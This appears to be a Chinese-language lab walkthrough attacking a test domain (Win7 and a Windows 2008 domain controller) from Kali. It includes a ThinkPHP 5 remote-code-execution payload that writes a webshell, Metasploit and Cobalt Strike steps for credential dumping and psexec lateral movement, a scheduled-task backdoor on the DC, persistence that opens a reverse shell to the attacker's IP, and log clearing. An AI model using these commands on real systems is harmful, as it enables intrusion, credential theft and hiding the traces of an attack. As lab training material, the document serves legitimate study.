环境搭建
win7
sun\leo 123.com
sun\Administrator dc123.com
外网:修改为自动获取 192.168.47.133
内网:192.168.138.136
手动开启php study
Win7有防火墙,域控,kali ping不到
win 2008
sun\admin 2020.com 修改密码为2021.com
内网:192.168.138.138
kali
192.168.47.128
外网渗透
信息收集
Nmap扫一下:
80端口网站,发现是thinkphp 5
搜索漏洞
验证版本:
漏洞利用
searchsploit thinkphp
使用kali提供的payload
cd /usr/share/exploitdb/exploits/php/webapps/
cat 46150.txt
写入webshell:
利用echo 写入一句话:
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ““ >cyshack.php
蚁剑连接
内网收集
ipconfig
net config worastation
…
当前用户为administrator 存在另外网段192.168.138.0
存在sun 域控 ip为192.168.138.138
获取win7权限
永恒之蓝
web_delivery
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序
use exploit/multi/script/web_delivery
设置payload为powershell
蚁剑直接运行:
获取权限
msfvenom
蚁剑上传
run vnc 可实时监控
获取凭证
使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
进程迁移:
creds_all:获取所有密码
域控
Msf与cs都试了一下
MSF
psexec
Lhost 设置为win7
Payload 为reverse_tcp
经常断
所以用了cs的psexec,挺稳定的,下面详细
ipc$ +定时马
没开445,但是开了139
win7与dc建立联系:
net use \192.168.138.138\ipc$ “dc123.com” /user:Administrator
关闭dc防火墙:
sc \192.168.138.138 create unablefirewall binpath= “netsh advfirewall set allprofiles state off //创建服务
sc \192.168.138.138 start unablefirewall //启动服务
挂代理,发现dc没开445
定时马:
Meterpreter 上传到 win7 木马失败
蚁剑上传:
共享给DC:
copy houmen.exe \192.168.138.138\c$
定时任务开启:
schtasks /create /tn “test” /tr C:\houmen.exe /sc once /st 23:36 /S 192.168.138.138 /RU System /u administrator /p “dc123.com”
拿下:
开启dc 3389:
run post/windows/manage/enable_rdp
CS
意在熟练cs
获取win7
还是web delivery:
运行上线:
现在为administrator所以提权:
成功提权:
获取凭证
hashdump
logonpasswords
内网扫描
portscan 192.168.138.0/24
扫到dc
psexec
为win7设置中转监听:
dc使用psexec:
选择凭证:
选择监听器与会话都是上一步所设置的中转监听
上线:
后门植入
metasploit自带的后门有两种方式启动的,一种是通过启动项启动(persistence),一种是通过服务启动(metsvc),另外还可以通过persistence_exe自定义后门文件。
persistence
原理:
Win7
在C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本
在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项
利用:
run persistence –h #查看帮助
run persistence -U -i 5 -p 1234 -r 192.168.47.128
#-U指定启动的方式为用户登录时,-i反向连接的时间间隔(5s) –r 指定攻击者的ip
当用户登录时,反弹shell到攻击机的1234
metsvc
原理:
在C:\Users***\AppData\Local\Temp\上传了三个文件(metsrv.x86.dll、metsvc-server.exe、metsvc.exe),通过服务启动,服务名为meterpreter
利用:
run metsvc –h # 查看帮助
run metsvc –A #自动安装后门
没成功
dc后门植入
persistence指向win7
监听win7 2345端口:
痕迹清理
一
run event_manager -i 查看事件日志
run event_manager -c 清理日志
二
clearev
